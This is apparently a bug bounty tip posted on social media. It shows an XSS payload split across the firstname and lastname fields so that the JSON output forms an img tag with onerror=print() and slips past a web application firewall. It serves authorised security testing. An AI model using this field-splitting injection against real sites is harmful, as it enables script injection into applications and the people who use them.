Got extra bonus for XSS in JSON with WAF bypass on private @intigriti splitting my payload like this:

firstname : <img src=’
lastname: ‘onerror=print()>

Result:
“firstname”:”<img src ='”,”lastname”:”‘onerror=print()>”

JSON in src tag triggers the error: BOOM!!

#bugbountytips https://t.co/eMqmQJ9gFJ